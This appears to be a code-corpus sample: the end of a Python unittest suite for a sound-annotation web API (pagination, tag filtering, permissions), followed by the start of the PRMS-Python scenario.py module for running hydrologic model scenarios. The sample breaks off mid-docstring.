self.assertTrue(all([item['created_by'] == user_uri for item in items]))
low_id = items[-1]['id']
resp = requests.get(
self.sounds_resource(),
params={
'page_size': 100,
'created_by': user2_id,
'low_id': low_id
},
auth=auth)
items = resp.json()['items']
self.assertEqual(3, len(items))
user_uri = f'/users/{user2_id}'
self.assertTrue(all([item['created_by'] == user_uri for item in items]))
def test_supports_something_stream_like(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
self._create_sounds_with_user(auth, 10, delay=0.1)
resp = requests.get(
self.sounds_resource(),
params={'page_size': 5},
auth=auth)
self.assertEqual(client.OK, resp.status_code)
self.assertEqual(5, len(resp.json()['items']))
self.assertEqual(10, resp.json()['total_count'])
low_id = resp.json()['items'][-1]['id']
resp = requests.get(
self.sounds_resource(),
params={
'page_size': 10,
'low_id': low_id
},
auth=auth)
self.assertEqual(client.OK, resp.status_code)
self.assertEqual(5, resp.json()['total_count'])
self.assertEqual(5, len(resp.json()['items']))
class UserSoundTests(BaseTests, unittest2.TestCase):
def test_not_found_for_nonexistent_user(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
self._create_sounds_with_user(auth, 5)
resp = requests.get(
self.user_sounds_resource('BAD_USER_ID'),
params={'page_size': 10},
auth=auth)
self.assertEqual(client.NOT_FOUND, resp.status_code)
def test_can_list_all_sounds_from_user(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
self._create_sounds_with_user(auth, 5)
user2, user2_location = self.create_user(user_type='dataset')
auth2 = self._get_auth(user2)
user2_id = user2_location.split('/')[-1]
self._create_sounds_with_user(auth2, 5)
resp = requests.get(
self.user_sounds_resource(user2_id),
params={'page_size': 10},
auth=auth)
items = resp.json()['items']
self.assertEqual(5, len(items))
user_uri = f'/users/{user2_id}'
self.assertTrue(all([item['created_by'] == user_uri for item in items]))
def test_can_stream_user_sounds_using_low_id(self):
user, user_location = self.create_user(user_type='dataset')
auth = self._get_auth(user)
user_id = user_location.split('/')[-1]
self._create_sounds_with_user(auth, 10)
user2, user2_location = self.create_user(user_type='dataset')
auth2 = self._get_auth(user2)
self._create_sounds_with_user(auth2, 5)
resp = requests.get(
self.user_sounds_resource(user_id),
params={'page_size': 3},
auth=auth)
items = resp.json()['items']
low_id = items[-1]['id']
resp = requests.get(
self.user_sounds_resource(user_id),
params={
'page_size': 100,
'low_id': low_id
},
auth=auth)
user_uri = f'/users/{user_id}'
items = resp.json()['items']
self.assertEqual(7, len(items))
self.assertTrue(all([item['created_by'] == user_uri for item in items]))
def test_can_filter_by_sound_tags(self):
user, user_location = self.create_user(user_type='dataset')
auth = self._get_auth(user)
user_id = user_location.split('/')[-1]
self._create_sounds_with_user(auth, 10, tags=['train'])
self._create_sounds_with_user(auth, 11, tags=['validation'])
resp = requests.get(
self.user_sounds_resource(user_id),
params={'page_size': 100, 'tags': 'train'},
auth=auth)
items = resp.json()['items']
self.assertEqual(10, len(items))
resp = requests.get(
self.user_sounds_resource(user_id),
params={'page_size': 100, 'tags': 'validation'},
auth=auth)
items = resp.json()['items']
self.assertEqual(11, len(items))
def test_sound_tag_filtering_is_implicit_and(self):
user, user_location = self.create_user(user_type='dataset')
auth = self._get_auth(user)
user_id = user_location.split('/')[-1]
self._create_sounds_with_user(auth, 10, tags=['train'])
self._create_sounds_with_user(auth, 11, tags=['validation'])
self._create_sounds_with_user(auth, 5, tags=['train', 'validation'])
resp = requests.get(
self.user_sounds_resource(user_id),
params={'page_size': 100, 'tags': 'train'},
auth=auth)
items = resp.json()['items']
self.assertEqual(15, len(items))
resp = requests.get(
self.user_sounds_resource(user_id),
params={'page_size': 100, 'tags': 'validation'},
auth=auth)
items = resp.json()['items']
self.assertEqual(16, len(items))
resp = requests.get(
self.user_sounds_resource(user_id),
params={'page_size': 100, 'tags': ['validation', 'train']},
auth=auth)
items = resp.json()['items']
self.assertEqual(5, len(items))
class UserAnnotationTests(BaseTests, unittest2.TestCase):
def test_not_found_for_nonexistent_user(self):
user, user_location = self.create_user(user_type='dataset')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=[f'drums{i}']) for i in range(10)]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
resp = requests.get(
self.user_annotations_resource('BAD_USER_ID'), auth=auth)
self.assertEqual(client.NOT_FOUND, resp.status_code)
def test_can_filter_user_annotations_by_tag(self):
user, user_location = self.create_user(user_type='dataset')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
fb, fb_location = self.create_user(user_type='featurebot')
fb_auth = self._get_auth(fb)
fb_id = fb_location.split('/')[-1]
annotation_data = [
self.annotation_data(tags=['drums']) for i in range(3)]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=fb_auth)
annotation_data = [
self.annotation_data(tags=['snare']) for i in range(4)]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=fb_auth)
user_uri = f'/users/{fb_id}'
resp = requests.get(
self.user_annotations_resource(fb_id),
params={'tags': 'drums'},
auth=auth)
items = resp.json()['items']
self.assertEqual(3, len(items))
def test_can_list_all_annotations_for_user(self):
user, user_location = self.create_user(user_type='dataset')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=[f'drums{i}']) for i in range(10)]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
fb, fb_location = self.create_user(user_type='featurebot')
fb_auth = self._get_auth(fb)
fb_id = fb_location.split('/')[-1]
annotation_data = [
self.annotation_data(tags=[f'drums{i}']) for i in range(3)]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=fb_auth)
user_uri = f'/users/{fb_id}'
resp = requests.get(
self.user_annotations_resource(fb_id),
auth=auth)
items = resp.json()['items']
self.assertEqual(3, len(items))
self.assertTrue(all([item['created_by'] == user_uri for item in items]))
def test_can_stream_user_annotations_using_low_id(self):
user, user_location = self.create_user(user_type='dataset')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=[f'drums{i}']) for i in range(10)]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
fb, fb_location = self.create_user(user_type='featurebot')
fb_auth = self._get_auth(fb)
fb_id = fb_location.split('/')[-1]
annotation_data = [
self.annotation_data(tags=[f'drums{i}']) for i in range(40)]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=fb_auth)
resp = requests.get(
self.user_annotations_resource(fb_id),
params={'page_size': 11},
auth=auth)
items = resp.json()['items']
self.assertEqual(11, len(items))
low_id = items[-1]['id']
resp = requests.get(
self.user_annotations_resource(fb_id),
params={
'page_size': 100,
'low_id': low_id
},
auth=auth)
user_uri = f'/users/{fb_id}'
items = resp.json()['items']
self.assertEqual(29, len(items))
self.assertTrue(all([item['created_by'] == user_uri for item in items]))
class AnnotationsTests(BaseTests, unittest2.TestCase):
def tearDown(self):
self.delete_all_data()
def test_can_exclude_sounds_with_no_tags(self):
user, user_location = self.create_user(user_type='dataset')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=['drums']),
self.annotation_data(tags=['snare'])
]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
user2, user2_location = self.create_user(user_type='featurebot')
auth2 = self._get_auth(user2)
annotation_data2 = [
self.annotation_data(data_url='http://example.com/1'),
self.annotation_data(data_url='http://example.com/2')
]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data2},
auth=auth2)
resp = requests.get(
self.annotations_resource(),
params={'page_size': 100, 'with_tags': True},
auth=auth)
items = resp.json()['items']
self.assertEqual(2, len(items))
def test_can_search_for_annotations_by_tag_with_pound_sign(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=['drums']),
self.annotation_data(tags=['musical_note:A#4'])
]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
resp = requests.get(
self.annotations_resource(),
params={'page_size': 100, 'tags': ['musical_note:A#4']},
auth=auth)
items = resp.json()['items']
self.assertEqual(1, len(items))
def test_can_search_across_sounds_by_tag(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=['drums']),
self.annotation_data(tags=['snare'])
]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
user2, user2_location = self.create_user(user_type='human')
auth2 = self._get_auth(user2)
sound_id2 = self._create_sound_with_user(auth2)
annotation_data2 = [
self.annotation_data(tags=['kick']),
self.annotation_data(tags=['snare'])
]
requests.post(
self.sound_annotations_resource(sound_id2),
json={'annotations': annotation_data2},
auth=auth)
resp = requests.get(
self.annotations_resource(),
params={'page_size': 100, 'tags': ['snare']},
auth=auth)
items = resp.json()['items']
self.assertEqual(2, len(items))
def test_can_list_annotations_from_most_to_least_recent(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=['drums']),
self.annotation_data(tags=['snare'])
]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
user2, user2_location = self.create_user(user_type='human')
auth2 = self._get_auth(user2)
sound_id2 = self._create_sound_with_user(auth2)
annotation_data2 = [
self.annotation_data(tags=['kick']),
self.annotation_data(tags=['snare'])
]
requests.post(
self.sound_annotations_resource(sound_id2),
json={'annotations': annotation_data2},
auth=auth)
resp1 = requests.get(
self.annotations_resource(),
params={'page_size': 100, 'tags': ['snare']},
auth=auth)
items1 = resp1.json()['items']
resp2 = requests.get(
self.annotations_resource(),
params={'page_size': 100, 'tags': ['snare'], 'order': 'desc'},
auth=auth)
items2 = resp2.json()['items']
self.assertSequenceEqual(items1, items2[::-1])
def test_tags_should_be_formatted_correctly_in_next_link(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=['drums']),
self.annotation_data(tags=['snare'])
]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
user2, user2_location = self.create_user(user_type='human')
auth2 = self._get_auth(user2)
sound_id2 = self._create_sound_with_user(auth2)
annotation_data2 = [
self.annotation_data(tags=['kick']),
self.annotation_data(tags=['snare'])
]
requests.post(
self.sound_annotations_resource(sound_id2),
json={'annotations': annotation_data2},
auth=auth)
resp = requests.get(
self.annotations_resource(),
params={'page_size': 1, 'tags': ['snare']},
auth=auth)
self.assertIn('tags=snare', resp.json()['next'])
class AnnotationTests(BaseTests, unittest2.TestCase):
def tearDown(self):
self.delete_all_data()
def test_can_filter_annotations_by_creating_user(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
user2, user2_location = self.create_user(user_type='featurebot')
auth2 = self._get_auth(user2)
sound_id = self._create_sound_with_user(auth)
annotation_data = self.annotation_data(tags=['drums'])
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': [annotation_data]},
auth=auth)
annotation_data = self.annotation_data(tags=['snare'])
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': [annotation_data]},
auth=auth2)
resp = requests.get(
self.sound_annotations_resource(sound_id),
params={
'created_by': user2_location.split('/')[-1],
'page_size': 10
},
auth=auth)
items = resp.json()['items']
self.assertEqual(1, len(items))
self.assertEqual('snare', items[0]['tags'][0])
def test_annotations_resource_supports_cors(self):
resp = requests.options(self.sounds_resource('blah'))
self.assertIn('Access-Control-Allow-Origin', resp.headers)
def test_human_can_create_annotation(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = self.annotation_data(tags=['drums'])
resp = requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': [annotation_data]},
auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
def test_created_by_user_name_is_included(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = self.annotation_data(tags=['drums'])
resp = requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': [annotation_data]},
auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
results = requests.get(
self.sound_annotations_resource(sound_id), auth=auth)
item = results.json()['items'][0]
self.assertEqual(
user['user_name'], item['created_by_user_name'])
def test_featurebot_can_create_annotation(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
fb, fb_location = self.create_user(user_type='featurebot')
fb_auth = self._get_auth(fb)
annotation_data = self.annotation_data(tags=['drums'])
resp = requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': [annotation_data]},
auth=fb_auth)
self.assertEqual(client.CREATED, resp.status_code)
def test_dataset_can_create_annotation(self):
user, user_location = self.create_user(user_type='dataset')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = self.annotation_data(tags=['drums'])
resp = requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': [annotation_data]},
auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
def test_aggregator_cannot_create_annotation(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
fb, fb_location = self.create_user(user_type='aggregator')
fb_auth = self._get_auth(fb)
annotation_data = self.annotation_data(tags=['drums'])
resp = requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': [annotation_data]},
auth=fb_auth)
self.assertEqual(client.FORBIDDEN, resp.status_code)
def test_can_create_multiple_annotations_at_once(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=[f'drums{i}']) for i in range(10)]
resp = requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
def test_cannot_create_annotation_for_nonexistent_sound(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = self.annotation_data(tags=['drums'])
resp = requests.post(
self.sound_annotations_resource(sound_id + 'WRONG'),
json={'annotations': [annotation_data]},
auth=auth)
self.assertEqual(client.NOT_FOUND, resp.status_code)
def test_can_list_annotations_for_a_sound(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=[f'drums{i}']) for i in range(10)]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
resp = requests.get(
self.sound_annotations_resource(sound_id),
auth=auth)
self.assertEqual(10, len(resp.json()['items']))
def test_can_filter_sound_annotations_by_tag(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=[f'drums{i}']) for i in range(10)]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
resp = requests.get(
self.sound_annotations_resource(sound_id),
params={'tags': 'drums0', 'page_size': 100},
auth=auth)
self.assertEqual(1, len(resp.json()['items']))
def test_can_exclude_sound_annotations_without_tags(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=[f'drums{i}']) for i in range(10)]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
annotation_data = [
self.annotation_data() for _ in range(11)]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
resp = requests.get(
self.sound_annotations_resource(sound_id),
params={'with_tags': True, 'page_size': 100},
auth=auth)
self.assertEqual(10, len(resp.json()['items']))
def test_can_filter_annotations_for_sound_overlapping_with_range(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
# full-duration
self.annotation_data(start_seconds=0,
duration_seconds=(6 * 60) + 42),
# completely before range
self.annotation_data(start_seconds=0, duration_seconds=4),
# end overlaps with range
self.annotation_data(start_seconds=1, duration_seconds=5),
# totally within range
self.annotation_data(start_seconds=6, duration_seconds=1),
# beginning overlaps with range
self.annotation_data(start_seconds=9, duration_seconds=5),
# completely after range
self.annotation_data(start_seconds=11, duration_seconds=5)
]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
resp = requests.get(
self.sound_annotations_resource(sound_id),
params={'time_range': '5-10'},
auth=auth)
items = resp.json()['items']
self.assertEqual(4, len(items))
def test_not_found_when_listing_annotations_for_nonexistent_sound(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
resp = requests.get(
self.sound_annotations_resource('WRONG'),
auth=auth)
self.assertEqual(client.NOT_FOUND, resp.status_code)
def test_can_create_annotation_with_external_data_url(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = self.annotation_data(data_url='https://example.com')
resp = requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': [annotation_data]},
auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
def test_no_annotations_are_created_when_one_is_invalid(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
def data_url(i):
return 'WRONG' if i == 0 else 'https://example.com'
annotation_data = \
[self.annotation_data(data_url=data_url(i)) for i in range(10)]
resp = requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_bad_request_when_creating_annotation_with_invalid_data_url(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = self.annotation_data(data_url='WRONG')
resp = requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': [annotation_data]},
auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_bad_request_when_no_annotations_are_provided(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = self.annotation_data(
data_url='https://example.com', start_seconds=0)
resp = requests.post(
self.sound_annotations_resource(sound_id),
json=annotation_data,
auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_can_create_annotation_with_start_seconds_of_zero(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = self.annotation_data(
data_url='https://example.com', start_seconds=0)
resp = requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': [annotation_data]},
auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
``` |
{
"source": "JohnVolk/PRMS-Python",
"score": 3
} |
#### File: PRMS-Python/prms_python/scenario.py
```python
import inspect
import json
import multiprocessing as mp
import os
import shutil
import uuid
from datetime import datetime
from .parameters import modify_params, Parameters
from .data import Data
from .util import load_statvar
from .simulation import Simulation
class ScenarioSeries(object):
"""
Create and manage a series of model runs where parameters are modified.
First initialize the series with an optional title and description.
Then to build the series the user provides a list of dictionaries with
parameter-function key-value pairs, and optionally a title and
description for each dictionary defining the individual scenario.
The ScenarioSeries' ``build`` method creates a file structure under
the series directory (``scenarios_dir``) where each subdirectory is
named with a :mod:`uuid` which can be later matched to its title using
the metadata in ``scenario_dir/series_metadata.json`` (see :mod:`json`).
In the future we may add a way for the user to access the results of
the scenario simulations directly through the ``ScenarioSeries``
instance, but for now the results are written to disk. Therefore each
scenario's title metadata can be used to refer to which parmaters were
modified and how for post-processing and analysis. One could also use
the description metadata for this purpose.
Arguments:
base_dir (str): path to base inputs; 'control', 'parameters',
and 'data' must be present there
scenarios_dir (str): directory where scenario data will be written
to; will be overwritten or created if it does not exist
Keyword Arguments:
title (str, optional): title of the ScenarioSeries instance
description (str, optional): description of the ScenarioSeries
instance
Attributes:
metadata (dict): dictionary with title, description, and UUID map
dictionary for individiual ``Scenario`` output directories,
the UUID dictionary (``uuid_title_map``)is left empty until
calling :meth:`ScenarioSeries.build`.
scenarios (list): empty list that will be filled with ``Scenario``s
after defining them by calling :meth:`ScenarioSeries.build`.
Example:
There are three steps to both ``Scenario`` and ScenarioSeries,
first we initialize the object
>>> series = ScenarioSeries(
>>> base_dir = 'dir_with_input_files',
>>> scenarios_dir = 'dir_to_run_series',
>>> title = 'title_for_group_of_scenarios',
>>> description = 'description_for_scenarios'
>>> )
The next step is to "build" the ``ScenarioSeries`` by calling the
:meth:`ScenarioSeries.build` method which defines which parameters
to modify, how to modify them, and then performs the modification
which readies the series to be "run" (the last step). See the
:meth:`ScenarioSeries.build` method for the next step example.
Also see :ref:`scenario_and_scenarioseries_tutorial` for full example
"""
def __init__(self, base_dir, scenarios_dir, title=None, description=None):
"""
"""
self.base_dir = base_dir
self.scenarios_dir = scenarios_dir
if os.path.exists(scenarios_dir):
shutil.rmtree(scenarios_dir)
os.mkdir(scenarios_dir)
shutil.copytree(base_dir, os.path.join(scenarios_dir, 'base_inputs'))
self.metadata = dict(title=title,
description=description,
uuid_title_map={})
self.scenarios = []
self.outputs = None
@classmethod
def from_parameters_iter(cls, base_directory, parameters_iter,
title=None, description=None):
'''
Alternative way to initialize and build a ``ScenarioSeries`` in one
step.
Create and build a ``ScenarioSeries`` by including the param-keyed-
function-valued dictionary (``parameters_iter``) that is otherwise
passed in :meth:`ScenarioSeries.build`.
Arguments:
base_directory (str): directory that contains model input files
parameters_iter (list of dicts): list of dictionaries for each
``Scenario`` as described in :class:`Scenario` and
:meth:`ScenarioSeries.build`.
title (str): title for group of scenarios
description (str): description for group of scenarios
Returns:
None
'''
series = cls(base_directory, base_directory,
title=title, description=description)
for parameters in parameters_iter:
title = parameters['title'] if 'title' in parameters else None
uu = str(uuid.uuid4())
series.metadata['uuid_title_map'].update({uu: title})
scenario_dir = os.path.join(series.scenarios_dir, uu)
scenario = Scenario(series.base_dir, scenario_dir, title=title)
scenario.build()
series.scenarios.append(scenario)
with open(
os.path.join(series.scenarios_dir, 'series_metadata.json'), 'w'
) as f:
f.write(json.dumps(series.metadata, indent=2))
def __len__(self):
return len(self.scenarios)
def build(self, scenarios_list):
"""
Build the scenarios from a list of scenario definitions in dicitonary
form.
Each element of ``scenarios_list`` can have any number of parameters
as keys with a function for each value. The other two acceptable keys
are ``title`` and ``description`` which will be passed on to each
individual Scenario's metadata in ``series_metadata.json`` for future
lookups. The ``build`` method also creates a file structure that uses
UUID values as individiual ``Scenario`` subdirectories as shown below.
Arguments:
scenarios_list (list): list of dictionaries with key-value
pairs being parameter-function definition pairs or
title-title string or description-description string.
Returns:
None
Examples:
Following the initialization of a ``ScenarioSeries`` instance as
shown the example docstring there, we "build" the series by
defining a list of param named-keyed function-valued
dictionaries. This example uses arbitrary functions on two
PRMS parameters *snowinfil_max* and *snow_adj*,
>>> def _function1(x): #Note, function must start with underscore
return x * 0.5
>>> def _function2(x):
return x + 5
>>> dic1 = {'snowinfil_max': _function1, 'title': 'scenario1'}
>>> dic2 = {'snowinfil_max': _function2,
'snow_adj': function1,
'title': 'scenario2',
'description': 'we adjusted two snow parameters'
}
>>> example_scenario_list = [dic1, dic2]
>>> # now we can build the series
>>> series.build(example_scenario_list)
In this example that follows from :class:`ScenarioSeries` example the
file structure that is created by the ``build`` method is as follows::
dir_to_run_series
├── 670d6352-2852-400a-997e-7b12ba34f0b0
│ ├── control
│ ├── data
│ └── parameters
├── base_inputs
│ ├── control
│ ├── data
│ └── parameters
├── ee9526a9-8fe6-4e88-b357-7dfd7111208a
│ ├── control
│ ├── data
│ └── parameters
└── series_metadata.json
As shown the build method has copied the original inputs from the
``base_dir`` given on initialization of ``ScenarioSeries`` to a new
subdirectory of the ``scenarios_dir``, it also applied the
modifications to the parameters for both scenarios above and move the
input files to their respective directories. At this stage the
``metadata`` will not have updated the UUID map dictionary to each
scenarios subdirectory because they have not yet been run. See the
:meth:`ScenarioSeries.run` method for further explanation including
the final file structure and metadata file contents.
"""
title = None
description = None
for s in scenarios_list:
if 'title' in s:
title = s['title']
del s['title']
if 'description' in s:
description = s['description']
del s['description']
uu = str(uuid.uuid4())
self.metadata['uuid_title_map'].update({uu: title})
scenario_path = os.path.join(self.scenarios_dir, uu)
# create Scenario
scenario = Scenario(
self.base_dir, scenario_path, title=title,
description=description
)
# s now only contains parameter keys and function references vals
scenario.build(s)
self.scenarios.append(scenario)
with open(
os.path.join(self.scenarios_dir, 'series_metadata.json'), 'w'
) as f:
f.write(json.dumps(self.metadata, indent=2))
def run(self, prms_exec='prms', nproc=None):
"""
Run a "built" ``ScenarioSeries`` and make final updates
to file structure and metadata.
Keyword Arguments:
prms_exec (str): name of PRMS executable on $PATH or path to
executable. Default = 'prms'
nproc (int or None): number of processceors available to
parallelize PRMS simulations, if None (default) then use
half of what the :mod:`multiprocessing` detects on the
machine.
Returns:
None
Examples:
This example starts where the example ends in
:meth:`ScenarioSeries.build`, calling ``run`` will run the
models for all scenarios and then update the file structure
as well as create individual ``Scenario`` metadata files as such::
dir_to_run_series
├── 5498c21d-d064-45f4-9912-044734fd230e
│ ├── inputs
│ │ ├── control
│ │ ├── data
│ │ └── parameters
│ ├── metadata.json
│ └── outputs
│ ├── prms_ic.out
│ ├── prms.out
│ └── statvar.dat
├── 9d28ec5a-b570-4abb-8000-8dac113cbed3
│ ├── inputs
│ │ ├── control
│ │ ├── data
│ │ └── parameters
│ ├── metadata.json
│ └── outputs
│ ├── prms_ic.out
│ ├── prms.out
│ └── statvar.dat
├── base_inputs
│ ├── control
│ ├── data
│ └── parameters
└── series_metadata.json
As we can see the file structure follows the combined structures
as defined by :class:`Simulation` and :class:`Scenario`. The content
of the top-level metadata file ``series_metadata.json`` is as such::
{
"title": "title_for_group_of_scenarios",
"description": "description_for_scenarios",
"uuid_title_map": {
"5498c21d-d064-45f4-9912-044734fd230e": "scenario1",
"9d28ec5a-b570-4abb-8000-8dac113cbed3": "scenario2"
}
}
Therefore one can use the :mod:`json` file to track between UUID's and
individual scenario titles. The json files are read as a Python
dictionary which makes them particularly convenient. The contents of
an individual scenarios ``metadata.json`` file included a string
representation of the function(s) that were applied to the
paramter(s)::
{
"description": null,
"end_datetime": "2018-09-03T00:00:40.793817",
"mod_funs_dict": {
"snowinfil_max": "def _function1(x):
return x * 0.5"
},
"start_datetime": "2018-09-03T00:00:30.421353",
"title": "scenario1"
}
Note:
As shown, it is important to give appropriate scenario titles when
building a ``ScenarioSeries`` dictionary in order to later
understand how parameters were modified in each scenario. If not
one would have to rely on the individual ``metadata.json`` files
in each scenario directory which may be more cumbersome.
"""
if not nproc:
nproc = mp.cpu_count()//2
pool = mp.Pool(processes=nproc)
pool.map(_scenario_runner, self.scenarios)
# multiprocessing req the function be def'd at root scope so it's picklable
def _scenario_runner(scenario, prms_exec='prms'):
scenario.run(prms_exec=prms_exec)
class Scenario:
"""
Container for the process in which one modifies input parameters then
runs a simulation while tracking metadata.
Metadata includes a title and description, if provided, plus start/end
datetime, and parameter names of parameters that were modified including
string representations of the Python modification functions that were
applied to each parameter. The metadata file is in :mod:`json` format
making it conveniently read as a Python dictionary.
Arguments:
base_dir (str): path to directory that contains initial *control*,
*parameter*, and *data* files to be used for ``Scenario``.
The *parameters* file in ``base_dir`` will not be modifed
instead will be copied to ``scenario_dir`` and them modified.
scenario_dir (str): directory path to bundle inputs and outputs
title (str, optional): title of ``Scenario``, if given will be
added to ``Scenario.metadata`` attribute as well as the
``metadata.json`` file in ``scenario_dir`` written after
calling the :func:`Scenario.build()` and :func:`Scenario.run()`
methods.
description (str, optional): description of ``Scenario``, also
is added to ``Scenario.metadata`` as ``title``.
Attributes:
metadata (:class:`scenario.ScenarioMetadata`): a dictionary-like
class in :mod:`prms_python.scenario` that tracks ``Scenario`` and
``ScenarioSeries`` imformation including user-defined parameter
modifications and descriptions, and file structure.
Examples:
This example is kept simple for clarity, here we adjust a
single PRMS parameter *tmin_lapse* by using a single arbitrary
mathematical function. We use the example PRMS model included
with PRMS-Python for this example,
>>> input_dir = 'PRMS-Python/test/data/models/lbcd'
>>> scenario_directory = 'scenario_testing'
>>> title = 'Scenario example'
>>> desc = 'adjust tmin_lapse using sine wave function'
>>> # create Scenario instance
>>> scenario_obj = Scenario
(
base_dir=input_dir,
scenario_dir=scenario_directory,
title=title,
description=desc
)
Next we need to build a dictionary to modify, in this case
*tmin_lapse*, here we use a vectorized sine function
>>> # build the modification function and dictionary
>>> def a_func(arr):
return 4 + np.sin(np.linspace(0,2*np.pi,num=len(arr)))
>>> # make dictionary with parameter names as keys and modification
>>> # function as values
>>> param_mod_dic = dict(tmin_lapse=a_func)
>>> scenario_obj.build(param_mod_funs=param_mod_dic)
After building a ``Scenario`` instance the input files are
copied to ``scenario_dir`` which was assigned 'scenario_testing'::
scenario_testing
├── control
├── data
└── parameters
After calling ``build`` the input files from ``input_dir`` were
first copied to ``scenario_dir`` and then the functions in
``param_mod_dic`` are applied the the parameters names (key)
in ``param_mod_dic``. To run the ``Scenario`` use the the ``run``
method
>>> scenario_obj.run()
Now the simulation is run and the ``metadata.json`` file is created,
the final file structure will be similar to this::
scenario_testing
├── inputs
│ ├── control
│ ├── data
│ └── parameters
├── metadata.json
└── outputs
├── prms_ic.out
├── prms.out
└── statvar.dat
Finally, here is what is contained in ``metadata.json`` for this example
which is also updates in the :attr:`Scenario.metadata`
>>> scenario_obj.metadata
{
